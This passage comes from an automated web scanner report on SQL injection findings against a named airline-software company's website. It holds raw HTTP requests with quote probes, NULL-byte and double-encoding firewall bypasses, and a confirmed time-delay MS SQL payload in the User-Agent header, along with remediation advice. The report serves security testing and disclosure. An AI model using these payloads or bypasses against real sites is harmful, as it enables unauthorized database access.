Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fabout%2Fpage-not-found%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A3%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 02:22:41 GMT
Pragma: no-cache
Content-Length: 7109
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

2.12. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_qualifier/ [exp_last_visit cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_aircentre_crew_qualifier/

Issue detail

The exp_last_visit cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_visit cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /home/products_services/product/sabre_aircentre_crew_qualifier/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086%00'; __utmc=178985382; exp_last_activity=1286322054; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_inventory%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:54:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/product/sabre_aircentre_crew_qualifier/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086%00''; __utmc=178985382; exp_last_activity=1286322054; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_inventory%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:54:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322054; expires=Thu, 06-Oct-2011 01:54:25 GMT; path=/
Set-Cookie: exp_last_activity=1286348065; expires=Thu, 06-Oct-2011 01:54:25 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A1%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A3%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 01:54:42 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

2.13. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_flight_explorer [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_aircentre_flight_explorer

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /home/products_services/product/sabre_aircentre_flight_explorer HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382%00'; exp_last_activity=1286322636; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A4%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:57:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/product/sabre_aircentre_flight_explorer HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382%00''; exp_last_activity=1286322636; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A4%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:57:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322636; expires=Thu, 06-Oct-2011 01:57:28 GMT; path=/
Set-Cookie: exp_last_activity=1286348248; expires=Thu, 06-Oct-2011 01:57:28 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 01:57:49 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25239


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

2.14. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_flight_plan_manager [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_aircentre_flight_plan_manager

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services/product/sabre_aircentre_flight_plan_manager HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2'; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322639; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A41%3A%22%2Fproducts_services%2Ftechnical_records_hub%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_planner%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:33:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/product/sabre_aircentre_flight_plan_manager HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2''; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322639; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A41%3A%22%2Fproducts_services%2Ftechnical_records_hub%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_planner%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:33:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322639; expires=Thu, 06-Oct-2011 01:33:15 GMT; path=/
Set-Cookie: exp_last_activity=1286346795; expires=Thu, 06-Oct-2011 01:33:15 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A41%3A%22%2Fproducts_services%2Ftechnical_records_hub%2F%22%3Bi%3A4%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 01:33:26 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23995


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

2.15. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_load_manager/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_aircentre_load_manager/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the User-Agent HTTP header. The application took 55344 milliseconds to respond to the request, compared with 26406 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /home/products_services/product/sabre_aircentre_load_manager/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)')waitfor%20delay'0%3a0%3a20'--
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322107; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A2%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Fsabre_qik_analysis_system%2F%22%3Bi%3A3%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:13:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322107; expires=Thu, 06-Oct-2011 02:13:38 GMT; path=/
Set-Cookie: exp_last_activity=1286349218; expires=Thu, 06-Oct-2011 02:13:38 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3Bi%3A1%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A3%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Fsabre_qik_analysis_system%2F%22%3Bi%3A4%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 02:14:32 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22352


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

2.16. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_movement_control [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_aircentre_movement_control

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services/product/sabre_aircentre_movement_control HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2'; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322670; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fincludes%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:33:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/product/sabre_aircentre_movement_control HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2''; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322670; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fincludes%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:33:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322670; expires=Thu, 06-Oct-2011 01:33:15 GMT; path=/
Set-Cookie: exp_last_activity=1286346795; expires=Thu, 06-Oct-2011 01:33:15 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A1%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A3%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A4%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 01:33:28 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23326


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

2.17. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_revenue_integrity/ [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_revenue_integrity/

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /home/products_services/product/sabre_revenue_integrity/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1%00'; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322292; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A1%3Bs%3A28%3A%22%2Fproducts_services%2Fairports%2F%22%3Bi%3A2%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3Bi%3A4%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:52:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/product/sabre_revenue_integrity/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1%00''; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322292; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A1%3Bs%3A28%3A%22%2Fproducts_services%2Fairports%2F%22%3Bi%3A2%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3Bi%3A4%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:52:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322292; expires=Thu, 06-Oct-2011 01:52:37 GMT; path=/
Set-Cookie: exp_last_activity=1286347957; expires=Thu, 06-Oct-2011 01:52:37 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A51%3A%22%2Fproducts_services%2Fproduct%2Fsabre_revenue_integrity%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A2%3Bs%3A28%3A%22%2Fproducts_services%2Fairports%2F%22%3Bi%3A3%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 01:52:50 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 24039


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

2.18. http://www.sabreairlinesolutions.com/home/products_services/product/technical_records_hub [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/technical_records_hub

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
